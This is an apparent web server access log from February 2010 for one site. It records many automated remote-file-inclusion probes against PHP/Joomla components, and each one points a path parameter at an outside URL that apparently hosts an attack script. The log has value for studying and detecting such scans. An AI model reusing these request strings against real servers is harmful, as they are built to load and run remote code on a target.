218.38.136.126 - - [08/Feb/2010:04:00:19 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:01:33 -0800] "GET /logs/access_100127.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:02:44 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:02:44 -0800] "GET /logs/access_100103.log//skin/zero_vote/ask_password.php?dir=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:02:45 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:03:27 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:03:27 -0800] "GET /logs/access_100111.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:03:27 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:03:53 -0800] "GET /logs/access_100201.log//skin/zero_vote/ask_password.php?dir=http://diskplus.kr/shop/icons/s1.asp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:04:19 -0800] "GET /logs/access_100112.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [08/Feb/2010:04:04:36 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.wonhyun.co.kr/bbs/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:04:05:47 -0800] "GET /appserv/main.php?appserv_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:04:05:48 -0800] "GET /logs/access_100114.log//appserv/main.php?appserv_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:04:05:49 -0800] "GET /logs//appserv/main.php?appserv_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [08/Feb/2010:04:06:07 -0800] "GET /logs/access_100111.log//appserv/main.php?appserv_root=http://eguruji.net/modlogan/daily_usage_200904.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:07:58 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:07:58 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:07:58 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:09:04 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:10:26 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:10:26 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:10:26 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:10:36 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:10:36 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:10:36 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:04 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:04 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:04 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:14 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:14 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:14 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:33 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:11:41 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:12 -0800] "GET /logs/access_100107.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:12 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:12 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:12:12 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:15 -0800] "GET /logs/access_100117.log//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:15 -0800] "GET /skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:15 -0800] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [08/Feb/2010:04:12:20 -0800] "GET /logs/access_100111.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:25 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:25 -0800] "GET /logs/access_100107.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:25 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:27 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:27 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [08/Feb/2010:04:12:27 -0800] "GET /logs/access_100107.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:55 -0800] "GET /skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:55 -0800] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:55 -0800] "GET /logs/access_100117.log%20%20//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:56 -0800] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:56 -0800] "GET /skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:12:56 -0800] "GET /logs/access_100117.log//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:13:46 -0800] "GET /skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:13:46 -0800] "GET /logs/access_100117.log%20%20//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:04:13:46 -0800] "GET /logs//skin/happycast_category_lightblack/setup.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:13:47 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:13:50 -0800] "GET /logs/access_100106.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:13:50 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:14:04 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:14:04 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:14:04 -0800] "GET /logs/access_100106.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:15 -0800] "GET /logs/access_100106.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:15 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:15 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:24 -0800] "GET /logs/access_100106.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:24 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:24 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:38 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:38 -0800] "GET /logs/access_100106.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:14:38 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:14:42 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:14:46 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:14:46 -0800] "GET /logs/access_100106.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:15:06 -0800] "GET /logs/access_100125.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:04:15:06 -0800] "GET /logs/access_100127.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:04:15:06 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:04:15:07 -0800] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:15:45 -0800] "GET /logs/access_100107.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:16:02 -0800] "GET /logs/access_100107.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:16:12 -0800] "GET /logs/access_100103.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:16:12 -0800] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:16:12 -0800] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:16:12 -0800] "GET /logs/access_100125.log%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:04:17:17 -0800] "GET /logs/access_100126.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [08/Feb/2010:04:17:32 -0800] "GET /logs/access_100106.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:04:19:11 -0800] "GET /component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
110.45.146.189 - - [08/Feb/2010:04:19:12 -0800] "GET /logs//component/option,com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:20:48 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:20:48 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:20:49 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:20:49 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:20:49 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:20:49 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:20:51 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:20:51 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:20:51 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:20:51 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:20:51 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:20:52 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:21:06 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:21:06 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:21:06 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:21:23 -0800] "GET /logs/access_100126.log%20%20/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:21:23 -0800] "GET /logs/dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [08/Feb/2010:04:21:23 -0800] "GET /dministrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?global$mosConfig_absolute_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:21:26 -0800] "GET /logs/access_100118.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:04:21:40 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:21:50 -0800] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:21:50 -0800] "GET /logs/access_100112.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:04:21:50 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:04:22:34 -0800] "GET /logs/access_100203.log%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
